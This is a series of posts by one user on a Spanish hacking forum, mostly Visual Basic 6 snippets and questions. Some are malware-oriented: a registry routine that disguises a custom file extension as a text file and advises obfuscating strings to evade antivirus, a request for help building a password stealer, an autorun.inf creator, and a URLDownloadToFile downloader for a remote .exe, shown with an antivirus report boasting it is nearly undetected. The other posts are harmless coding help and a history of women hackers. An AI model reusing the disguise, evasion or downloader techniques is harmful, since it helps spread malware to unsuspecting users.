   WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
End Function


Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)
Código (vb) [Seleccionar]
InfectExt "virus", "Archivo de Texto", True


PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^




Editado, Ahora permite elegir si la extensión queda siempre oculta o no.
#67
Hoaaa  :rolleyes: :rolleyes:

Voy a hacer un programa trilladisimo.
Guarda los contactos de msn en un documento y permite agregarlos todos juntos de una vez ^^

Quisiera saber como hago para que el programa tenga "Pestañas".
ejemplo:

(los botoncitos logs, builder, stealer)


Como funciona el cls (modulo de clase) XP button y que ventaja tiene frente a mi querido Command Button


y ultima:
como hago para que un list box tenga varias columnas?.



Gracias ^^
#68
Que hace?
Genera strings aleatorias entre dos rango de caracteres ascii

Para que sirve?
y yo como voy a saber
Para crear contraceñas o claves

Como hace?
uso como seed la division "timer" (ni idea que es eso, me lo dijo un amigo y no se de donde sale ese numero.) por la hora del sistema.
despues uso rnd para "fabricar" un numero y a eso lo multiplica por la diferencia entre el maximo valor ascii y el minimo mas uno. Al resultado se le suma el minimo valor ascii y despues se convierte a caracter con la funcion chr

Codigo mRndString
Código (vb) [Seleccionar]
'/-------------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mRndString                                                        |=|
'|=| DateTime    : 17/07/2010 07:42 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : Generates Randoms Strings (like a Password)                       |=|
'|=| Requirements: Two hands (I havent tried with one, it migth work, I don't know)  |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
'\-------------------------------------------------------------------------------------/
Option Explicit
Public Function Random_String(StringLength As Long) As String
   Dim FinalString As String
   Dim MaxAscii As Integer
   Dim MinAscii As Integer
   Dim CurLength As Long
   
   'ENG: 48 to 126 All characters | 65 to 126 just letters |48 to 57 Numbers Only | for more info get an ascii table. >.<
   'ESP: 48 al 126 Todos los caracteres | 65 al 126 solo letras | 48 al 57 Solo Numeros | Para mas info buscate una table ascii >.<
   MaxAscii = 126
   MinAscii = 48
   
   'ENG: to make it as random as I can the number changes each milisecond.
   'ESP: para hacerlo lo mas aleatorio posible el numero cambia cada milisegundo.
   Randomize Timer / Val(Time)
   
   
   For CurLength = 1 To StringLength
       FinalString = FinalString & Chr(Int((MaxAscii - MinAscii + 1) * Rnd + MinAscii))
   Next CurLength
   
   Random_String = StrReverse(FinalString)
End Function


Proyecto de ejemplo
Pongan en un form 2 textbox y un comand button
el siguiente codigo va en el codigo del boton
(la caja 1 sera la string generada y la caja 2 sera la longitud)
Código (vb) [Seleccionar]
Text1.Text = Random_String(Text2.Text)

Espero que sirva ^.^
#69
Nod 32 Downloader
=================

¿Para que Sirve?
Sirve?
Para descargar versiones comerciales de los antivirus de ESET hace falta acceder de la siguiente manera:
http://User:pass@URLDeDescarga
Esto obtiene el user y password y lo descarga sin intervencion.

¿Como lo hace?
Se conecta a internet, obtiene el codigo fuente de nod321, lo recorta para sacar los user y password, y con un control INET descarga el archivo.

ScreenShot


Descarga
http://depositfiles.com/files/906myehgc



Sinceramente, de lo unico que dudo es sobre el control inet en la descarga.
Fue la unica descarga con progressbar que encontre.
#70
hola.
Estaba haciendo un programa que baja archivos a simple vista y queria ponerle un progress bar.

pero los ejemplos que encuentro son con metodos de descarga rarisimos.
yo estaba por usar este metodo:
http://foro.elhacker.net/programacion_visual_basic/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.0.html

existe uno mejor?

y ademas queria saber... yo use el microsoft windows common controls 6.0 para poner la progressbar. esta bien ese? o hay que usar otro?

Muchas gracias por la info ^^
#71
Hola :D

Estaba Pensando en hacer un stealer en VB6.0 y me di cuenta de que no tengo idea de como funciona  :xD :¬¬

Asi que vamos desde el vamos.
Se que para enviar por email hay un codigo pero como "Consigo" las contraceñas "Guardadas" en el pc.

Pense que por registro podia sacar algo pero solamente podria sacar la cdkeys de algunos juegos.

Gracias por la ayuda :D
#72
Elemental Runner








Elemental Runner es un programa que permite crear el archivo Autorun.inf con las especificaciones que queramos.

Descarga

#73
Código (vb) [Seleccionar]

' ////////////////////////////////////////////////////////////////
' // *Autor: Elemental Code (Milton.Candelero@gmail.com)        //
' // *El codigo se puede cambiar todo lo que quiera siempre y   //
' // cuando se respete la autoria.                              //
' // *Funcion: Hace que el texto cambie cada 150ms y cree un    //
' // efecto de "Ondulacion"                                     //
' ////////////////////////////////////////////////////////////////

Option Explicit
Dim TextoA As String
Dim TextoB As String
Public Function Cargar_Texto_Con_Onditas(Texto As String, Cantidad As Integer, Relojito As Timer)
   Relojito.Enabled = False
   Dim ia As Integer
   Dim ib As Integer
   Dim OnditaA As String
   Dim OnditaB As String
   
   For ia = 0 To Cantidad
       OnditaA = OnditaA & ".·"
   Next
   For ib = 0 To Cantidad
       OnditaB = OnditaB & "·."
   Next
   TextoA = OnditaA & Texto & OnditaB
   TextoB = OnditaB & Texto & OnditaA
   
   Relojito.Interval = 150
   Relojito.Enabled = True
End Function

Public Function Timer_Texto_Con_Onditas(salida As Label)
   If salida.Caption = TextoA Then
       salida.Caption = TextoB
   Else
       salida.Caption = TextoA
   End If
End Function





NOTA IMPORTANTE:
El texto ".&#183;" y "&#183;." deben ser reemplazados por ".·" y "·." respectivamente ya que el foro me elimino esos caracteres especiales.


--> Que Hace?
Agrega a un texto unos puntos en movimiento que le dan un efecto de ondeado similar al que se aprecia en "Cactus Metamorph"




--> Como se Usa?
En un formulario poner una label (Preferentemente con Autosize = True) y un Timer (se pueden poner otros controles pero lo basico es eso.)

En el evento load se llama a la siguiente funcion:
call Cargar_Texto_Con_Onditas(Texto As String, Cantidad As Integer, Relojito As Timer)
Donde:
"Texto" sera la palabra a la cual se le agregara "onditas"
"Cantidad" sera la cantidad de "Onditas"
"Relojito" Sera el nombre del control del Timer que se utilizara.

En el evento on timer (el mismo timer que se especifico en "Relojito") se llama a la siguiente funcion:
call Timer_Texto_Con_Onditas(salida As Label)
Donde:
"Salida" es la Label o etiqueta adonde aparecera el resultado.




Es muy dificil mostrarselos en un ejemplo ya que la onda es que cambia.


Es la primera "Funcion" que hago y por eso esta Horrible :D
#74
Ya resolvi mi problema aunque no pude usar un Drivebox use un ComboBox

Código (vb) [Seleccionar]
 
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Private Sub lista()
    Dim NumDisco As Integer
    Dim letradisco As String
   
    For NumDisco = 0 To 25
        letradisco = Chr(NumDisco + 65) & ":\"
        Letrasola = UCase(Chr(NumDisco + 65))
        Label1.Caption = Letrasola
       
        senal = GetDriveType(letradisco)
       
       
        If senal = 2 Then
           Combo1.AddItem letradisco
        End If
    Next
End Sub


Si quieren cambiar el tipo de unidad que se muestra es asi:

Código (vb) [Seleccionar]
If senal = 2 Then

1 y 2 =No Instalado
2 = Extraible
3 = Fijo (Disco Duro)
4 = Remoto
5 = CD o DVD
6 = RAMDISK


Codigo Adaptado desde :
http://www.hackhispano.com/foro/showthread.php?t=33390




Cita de: Post Original en el que preguntaba como hacer
Hola.

Estaba pensando un programa y necesito que el drivebox muestre solamente unidades extraibles (Pendrive, Tarjetas, etc)

estuve viendo este codigo de Psyke pero no entendi nada :S

http://foro.elhacker.net/analisis_y_diseno_de_malware/src_vb6_usb_vaccination_by_psyke1-t294147.0.html

Espero que me puedan ayudar.

;D ;D ;D
Gracias
#75
Elemental Useless File Creator
(EUFC)

¿Que Hace?
Crea un archivo "dummy" osea totalmente inutil del tamaño que quieras y con los atributos que quieras.

¿Para que sirve?
Excelente pregunta...   :-X :-[ :-X

Screenshot


Descarga

http://depositfiles.com/files/t2zz0hf47


Sinceramente mas que para crear archivos para hacer "Peso" no se me ocurre ninguna utilidad pero me costo armarlo asi que aqui esta.

PD: El codigo es un desastre, lo se  :-[ :-[
#76
Hardware / Ayuda para elegir notebook
31 Mayo 2010, 17:39 PM

para estas vacaciones de invierno tngo que ir a buenos aires por razones de salud (de mi hermanita no mias) y estaba por comprarme esta notebook

http://www.eagleinformatica.com.ar/product_info.php?cPath=42&products_id=454&osCsid=78db56c9a61bc87d492b9f069321c1ed

No me parece muy cara pero ustedes siempre saben mas que yo :D

diganme si es caro, barato si hay mejores peores, muestren su envidia, etc.




Pregunte en otros lados y me dijeron que era un choreo y que en dell conseguia lo mismo a mitad de precio asi que me fije y no hay mucha diferencia :S

http://i45.tinypic.com/ye5vs.jpg




Muchas gracias por su atencion y si esto no se puede hacer pido perdon  :-[
#77
Hola.
no se si es porque mi vb esta en windows 7 o porque es asi pero
cuando pongo un icono en una aplicacion sale bien en una carpeta (osea en miniatura o el escritorio) pero durante la ejecucion (en la barra del progama y la barra de windows) me sale con 16 bits de color.

Esto es porque yo hago algo mal?
es porque vb6.0 esta diseñado para windows 98?

Saludos :D

PD: intente editar el icono y borrar las imagenes de 16 bits de color del icono y vb no me las reconoce.

Graicas
#78
Hola :D
Recorde que yo en mis tiempos de windows XP usaba un codigo VBE o VBS no me acuerdo bien ahora que era asi:

Hacias un txt y lo gurdabas como .vbe o .vbs no me acuerdo y escribias asi.

Si tienes menos de 128 Mb de memoria RAM, escribes Mystring=(16000000)

Si tienes 128 Mb de memoria RAM o más escribes Mystring=(80000000)

o asi:

FreeMem = Space(80000000)

tampoco me acuerdo cual era :S.

Mi pregunta es:
Estos codigos son de Visual Basic.??
Se los puede llamar?
Funcionan en todos los windows (Desde XP hasta 7)?
Ya esta hecho esto  :xD?


Muchas Gracias  ::)
#79
Foro Libre / Mujeres Hackers Famosas
22 Mayo 2010, 22:41 PM
Grace Murray Hopper (EEUU, 1906-1992)



Conocida por el nickname de Amazing Grace (asombrosa Grace) Pionera en el mundo de la informática, fue la primera programadora que usó el Mark I, la primera computadora electromagnética construida en 1941. Grace estaba convencida de que las computadoras acabarían formando parte de la vida cotidiana mas allá del ámbito científico y militar. Una idea totalmente innovadora y visionaria en una década en la que el PC era impensable e Internet sólo era ciencia ficción. Desarrolló los primeros compiladores de la Historia (el "A-O" y el "B-O") y creó el primer lenguaje de programación de alto nivel orientado al ámbito de gestión (Flow-Matic) que sentaría las bases del lenguaje COBOL.

Como anécdota, Grace Hopper utilizó por primera vez el término "bug" para referirse a un fallo informático cuando descubrió un insecto (bug, en inglés) atrapado en los relés del ordenador con el que estaba trabajando. El insecto tuvo una muerte gloriosa al quedar archivado y pegado en el libro de registro de la actividad del ordenador con el comentario escrito por la propia Grace: "First actual case of bug being found" (primer caso real de bug encontrado).
En 1971 , en honor a Grace, se establecieron los premios "Grace Murray Hopper Adward" que se otorgan anualmente a personalidades relevantes del mundo de la computación. En 1990 el premio fue recibido por Richard Stallman y dos años más tarde cuando la World Wide Web despertaba un nuevo mundo la asombrosa Grace dejaba el suyo en Arlington (Virginia) a la edad de 86 años.




Jude Milhon (EEUU, 1939-2003)



Más conocida por el nick de St. Jude. Hacker, programadora informática, escritora, fiel defensora de los ciberderechos, creadora del movimiento ciberpunk y luchadora incansable por la participación activa de las mujeres en la red. Su famosa frase "Girls need modems" (las chican necesitan módem) recorría las míticas BBS allá por los albores de Internet animando a las mujeres a aventurarse en los "placeres del hackeo" entendiendo las nuevas tecnologías y utilizándolas para superar el miedo de no ser lo bastante guapas, lo bastante fuertes, lo bastante bellas, o lo bastante lo que sea. Decía Jude que en el hacking, como en el sexo, entra la actividad de un yo deseante. Y allí donde termina el conflicto mente-cuerpo comienza la liberación.
Jude Milhon entendía el hacking como el deseo de descubrir, la curiosidad, el reto, pero también un conflicto: el hacking es un arte marcial para defenderse de lo políticamente correcto, de las leyes abusivas, de los fanáticos y de todo tipo de cenutrios. La lucha y rebeldía de Jude Milhon han pasado a la historia de la filosofía hacker resumidas en una famosa entrevista que publicaba Wired News en 1995 .
"Las piedras y los palos pueden romperme los huesos, pero las palabras en una pantalla pueden hacerme daño sólo si y hasta que yo lo permita."
El día de su muerte un famoso titular ocupaba todos los diarios digitales de Internet: "los hackers han perdido a su santa protectora". Jude Milhon, Saint Jude, una leyenda inolvidable.




Barbara Thoens (Alemania)



Barbara Thoens es una caso atípico. Formada en humanidades, una mujer de "letras" que se introduce en el mundo de la computación cuando tenía casi 30 años y actualmente es una de las pocas integrantes femeninas del mítico CCC (Chaos Computer Club), grupo de élite hacker en Alemania. Para Barbara Thoens ser hacker es una actitud de vida que significa que eres curiosa, que te interesa averiguar lo que hay detrás de algo, hacer las cosas por una misma, construir, crear y aprender Para ella hackear es un asunto político según contaba en una entrevista realizada en 1.999: hackear es político porque significa descubrir lo que ocultan sistemas, software y programas que sus creadores no quieren que conozcamos, el conocimiento está íntimamente relacionado con el poder, la información escondida puede ser muy peligrosa.
Como miembro del CCC una de sus primeras actividades fue desmantelar la frágil seguridad de los sistemas de banca online que acababan de nacer en los 90 demostrando la importancia de la criptografía en el mundo de los negocios de Internet que hasta entonces casi nadie tomaba en serio. Barbara Tohens no oculta su identidad y es usual verla en las reuniones anuales del CCC aunque su nick en la red es un misterio y las actividades que realiza dentro del Chaos Computyer Club sólo están al alcance de una élite.




Joanna Rutkowska (Polonia)



Considerada una experta mundial en malware, esta muy joven polaca comenzó a interesarse por la programación aprendiendo ensamblador con un X86 usando Ms-Dos cuando estaba en la escuela primaria. Pronto se pasó al mundo Linux experimentando con el desarrollo de exploits para Linux y Windows. Desde hace dos años su investigación se centra en los entresijos de las tecnologías que usa el malware y sus atacantes para ocultar sus acciones, incluyendo rootkits, backdoors, etc. y el desarrollo de nuevas técnicas contraofensivas para proteger el kernel de los sistemas operativos.
En el 2006 durante una convención de Black Hat mientras Microsoft daba una conferencia sobre la seguridad de la nueva version "Vista", en una sala contigua Joanna Rutkowska demostraba como insertar código malicioso en el corazón de una copia de Windows Vista. Para ello se valió de la Píldora azul (Blue Pill), un juguete peligroso programado por ella misma capaz de crear malware 100% indetectable en algunos S.O. Joanna Rutkowska confiesa que navega sin antivirus y que no confía en las soluciones comerciales existentes "porque sé lo fácil que resulta crear un malware que las supere todas".
Prepara un curso sobre ocultación de malware para impartir en la proxima reunión de Black Hat-2007.




No se ustedes lo sabian pero yo no.
Y si ya esta posteado perdon :D
#80




¿Qué es Elemental Multi MSN?
Es un programa que te permite abrir mas de un MSN (Messenger) a la vez.

¿Como funciona?
Hace unas modificaciones en el registro.

¿Para qué Version de MSN esta pensado?
Tecnicamente Todas, Solamente se probo para el MSN 9 y 8.5

Descarga:
http://depositfiles.com/files/u4o11xlfz

Se que soy un despelote con el codigo pero bue :D
#81
Hola.
Mi pregunta ya fue hecha mas de una vez pero nunca encontre una solucion porque las respuestas no decian nada.

Aver por ejemplo:
Tengo un programa que necesita que este instalada en en sistema X.dll la fuente pixel.ttf y que en la carpeta del ejecutable este un archivo que se llame asd.dsa.

Hay alguna manera de compilar todo esto para que el usuario final no tenga que hacerlo?

Gracias :D
#82
Hola.
queria saber si hay alguna forma de agregar musica en formato de trackers (.XM o .MOD) a mis programas en visual basic 6.0

No me importa que tipo de codigo sea.
pueden ser apis, funciones, cualquiercosa.

Muchas gracias.

PD: si por las dudas no saben ese tipo de musica es la que se usa en los keygen y la cualidad es de ser muuuuuy liviana.
un tema de 15 minutos puede pesar 500kb.
Gracias de nuevo :D
#83
Obviamente el codigo no es mio  :-X
Lei por muchos lados que esto ya era detectado por los antivirus.
pero yo hice un programa con este codigo y Casi indetectable.
Solamente lo detecta el Fprot6

Lo meten al form y agregan un boton "cmdDownload" para que baje o sino lo ponen como quiera

Código (vb) [Seleccionar]

'Funcion para bajar archivo
Private Declare Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
    ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub cmdDownload_Click()
    ' Bajar el Archivo
    URLDownloadToFile 0, _
        "www.tusitioweb.com/tuarchivo.exe", _
        "C:\Tuarchivo.exe", 0, 0
End Sub


File Info

Report date: 2010-04-16 23:52:42 (GMT 1)
File name: Mini_Downloader.exe
File size: 16384 bytes
MD5 Hash: e6377d5a23422abc8984eda961e2c1c4
SHA1 Hash: 95fdd84d8dca03d65254b8268691af52efbe36b7
Detection rate: 1 on 20 (5%)
Status: INFECTED
Ver reporte completo

SOURCE:
Descargar Source

PD: no he podido encontrar como adjuntar archivos al post